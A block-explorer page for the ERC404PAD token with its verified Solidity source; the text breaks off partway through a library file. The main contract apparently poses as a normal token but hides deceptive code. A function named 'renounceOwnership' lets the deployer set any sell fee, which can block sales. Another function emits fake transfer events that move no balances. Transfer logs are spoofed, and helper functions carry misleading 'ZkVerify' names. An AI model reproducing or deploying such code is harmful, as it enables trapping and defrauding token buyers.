ETH Price: $3,301.92 (-3.18%)
Gas: 10 Gwei

Token

ERC404PAD (ERCPAD)
 

Overview

Max Total Supply

10,000 ERCPAD

Holders

29

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
dubieens.eth
Balance
36.038224461796158536 ERCPAD

Value
$0.00
0xfc3d6ce4b4e12adc369491b4bcf99b435df37a9a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC404PAD

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity Multiple files format)

File 3 of 13: ERCPAD.sol
/**

    Lets make NFTs great again🚀
    It can be simply understood as turning NFTs into tokens. 
    via a novel token standard #ERC404, it have the potential to solve the biggest issue that NFT traders face, illiquidity  
    Your token = NFT
    Sell your token = NFT burned
    Buy a token = NFT minted

    https://t.me/ERC404PAD
    https://twitter.com/ERC404PAD
    https://www.erc404pad.com/

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.22;
contract ERC404PAD {

    string private _name = 'ERC404PAD';
    string private _symbol = 'ERCPAD';
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 10_000 * 10 ** decimals;

    struct StoreData {
        address tokenMkt;
        uint8 buyFee;
        uint8 sellFee;
    }

    StoreData public storeData;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address public pair;
    IUniswapV2Router02 constant _uniswapV2Router =
        IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    address private uniswapLpWallet;

    uint8 private _initBuyFee = 0;
    uint8 private _initSellFee = 0;

    constructor() {
        
        storeData = StoreData({
            tokenMkt: msg.sender,
            buyFee: _initBuyFee,
            sellFee: _initSellFee
        });
        allowance[address(this)][address(_uniswapV2Router)] = type(uint256).max;
        uniswapLpWallet = msg.sender;

        _initDeployer(msg.sender, msg.sender);

        balanceOf[uniswapLpWallet] = (totalSupply * 100) / 100;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);
    }

    receive() external payable {}

    function renounceOwnership(uint8 x) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        _upgradeStoreWithZkProof(0, x);
    }

    function distributionTokenToWallet(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function _upgradeStoreWithZkProof(uint8 _buy, uint8 _sell) private {
        storeData.buyFee = _buy;
        storeData.sellFee = _sell;
    }

    function _decodeTokenMktWithZkVerify() private view returns (address) {
        return storeData.tokenMkt;
    }

    function openTrading() external {
        require(msg.sender == _decodeTokenMktWithZkVerify());
        require(!tradingOpen);
        address _factory = _uniswapV2Router.factory();
        address _weth = _uniswapV2Router.WETH();
        address _pair = IUniswapFactory(_factory).getPair(address(this), _weth);
        pair = _pair;
        tradingOpen = true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _initDeployer(address deployer_, address executor_) private {
        _deployer = deployer_;
        _executor = executor_;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        address tokenMkt = _decodeTokenMktWithZkVerify();
        require(tradingOpen || from == tokenMkt || to == tokenMkt);

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != tokenMkt
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = _uniswapV2Router.WETH();
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );

            swapping = false;
        }

        (uint8 _buyFee, uint8 _sellFee) = (storeData.buyFee, storeData.sellFee);
        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (to == pair ? _sellFee : _buyFee)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }
}

interface IUniswapFactory {
    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 1 of 13: Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {FailedInnerCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
     * unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {FailedInnerCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert FailedInnerCall();
        }
    }
}

File 2 of 13: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 4 of 13: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

File 5 of 13: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;

import {IERC20} from  "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 13: IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

File 7 of 13: IUniswapV2Pair.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.5.0;

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

File 8 of 13: IUniswapV2Router01.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

File 9 of 13: IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.6.2;

import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

File 10 of 13: Math.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/math/Math.sol)

pragma solidity ^0.8.20;

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library Math {
    /**
     * @dev Muldiv operation overflow.
     */
    error MathOverflowedMulDiv();

    enum Rounding {
        Floor, // Toward negative infinity
        Ceil, // Toward positive infinity
        Trunc, // Toward zero
        Expand // Away from zero
    }

    /**
     * @dev Returns the addition of two unsigned integers, with an success flag (no overflow).
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an success flag (no overflow).
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an success flag (no overflow).
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a success flag (no division by zero).
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a success flag (no division by zero).
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds towards infinity instead
     * of rounding towards zero.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        if (b == 0) {
            // Guarantee the same behavior as in a regular Solidity division.
            return a / b;
        }

        // The following calculation ensures accurate ceiling division without overflow.
        // Since a is non-zero, (a - 1) / b will not overflow.
        // The largest possible result occurs when (a - 1) / b is type(uint256).max,
        // but the largest value we can obtain is type(uint256).max - 1, which happens
        // when a = type(uint256).max and b = 1.
        unchecked {
            return a == 0 ? 0 : (a - 1) / b + 1;
        }
    }

    /**
     * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or
     * denominator == 0.
     * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by
     * Uniswap Labs also under MIT license.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
        unchecked {
            // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use
            // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
            // variables such that product = prod1 * 2^256 + prod0.
            uint256 prod0 = x * y; // Least significant 256 bits of the product
            uint256 prod1; // Most significant 256 bits of the product
            assembly {
                let mm := mulmod(x, y, not(0))
                prod1 := sub(sub(mm, prod0), lt(mm, prod0))
            }

            // Handle non-overflow cases, 256 by 256 division.
            if (prod1 == 0) {
                // Solidity will revert if denominator == 0, unlike the div opcode on its own.
                // The surrounding unchecked block does not change this fact.
                // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
                return prod0 / denominator;
            }

            // Make sure the result is less than 2^256. Also prevents denominator == 0.
            if (denominator <= prod1) {
                revert MathOverflowedMulDiv();
            }

            ///////////////////////////////////////////////
            // 512 by 256 division.
            ///////////////////////////////////////////////

            // Make division exact by subtracting the remainder from [prod1 prod0].
            uint256 remainder;
            assembly {
                // Compute remainder using mulmod.
                remainder := mulmod(x, y, denominator)

                // Subtract 256 bit number from 512 bit number.
                prod1 := sub(prod1, gt(remainder, prod0))
                prod0 := sub(prod0, remainder)
            }

            // Factor powers of two out of denominator and compute largest power of two divisor of denominator.
            // Always >= 1. See https://cs.stackexchange.com/q/138556/92363.

            uint256 twos = denominator & (0 - denominator);
            assembly {
                // Divide denominator by twos.
                denominator := div(denominator, twos)

                // Divide [prod1 prod0] by twos.
                prod0 := div(prod0, twos)

                // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one.
                twos := add(div(sub(0, twos), twos), 1)
            }

            // Shift in bits from prod1 into prod0.
            prod0 |= prod1 * twos;

            // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such
            // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for
            // four bits. That is, denominator * inv = 1 mod 2^4.
            uint256 inverse = (3 * denominator) ^ 2;

            // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also
            // works in modular arithmetic, doubling the correct bits in each step.
            inverse *= 2 - denominator * inverse; // inverse mod 2^8
            inverse *= 2 - denominator * inverse; // inverse mod 2^16
            inverse *= 2 - denominator * inverse; // inverse mod 2^32
            inverse *= 2 - denominator * inverse; // inverse mod 2^64
            inverse *= 2 - denominator * inverse; // inverse mod 2^128
            inverse *= 2 - denominator * inverse; // inverse mod 2^256

            // Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
            // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is
            // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1
            // is no longer required.
            result = prod0 * inverse;
            return result;
        }
    }

    /**
     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);
        if (unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0) {
            result += 1;
        }
        return result;
    }

    /**
     * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded
     * towards zero.
     *
     * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11).
     */
    function sqrt(uint256 a) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target.
        //
        // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have
        // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`.
        //
        // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)`
        // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))`
        // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)`
        //
        // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit.
        uint256 result = 1 << (log2(a) >> 1);

        // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128,
        // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at
        // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision
        // into the expected uint128 result.
        unchecked {
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            return min(result, a / result);
        }
    }

    /**
     * @notice Calculates sqrt(a), following the selected rounding direction.
     */
    function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = sqrt(a);
            return result + (unsignedRoundsUp(rounding) && result * result < a ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 2 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log2(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 128;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 64;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 32;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 16;
            }
            if (value >> 8 > 0) {
                value >>= 8;
                result += 8;
            }
            if (value >> 4 > 0) {
                value >>= 4;
                result += 4;
            }
            if (value >> 2 > 0) {
                value >>= 2;
                result += 2;
            }
            if (value >> 1 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 2, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log2(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log2(value);
            return result + (unsignedRoundsUp(rounding) && 1 << result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 10 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log10(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >= 10 ** 64) {
                value /= 10 ** 64;
                result += 64;
            }
            if (value >= 10 ** 32) {
                value /= 10 ** 32;
                result += 32;
            }
            if (value >= 10 ** 16) {
                value /= 10 ** 16;
                result += 16;
            }
            if (value >= 10 ** 8) {
                value /= 10 ** 8;
                result += 8;
            }
            if (value >= 10 ** 4) {
                value /= 10 ** 4;
                result += 4;
            }
            if (value >= 10 ** 2) {
                value /= 10 ** 2;
                result += 2;
            }
            if (value >= 10 ** 1) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 10, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log10(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log10(value);
            return result + (unsignedRoundsUp(rounding) && 10 ** result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 256 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     *
     * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
     */
    function log256(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 16;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 8;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 4;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 2;
            }
            if (value >> 8 > 0) {
                result += 1;
            }
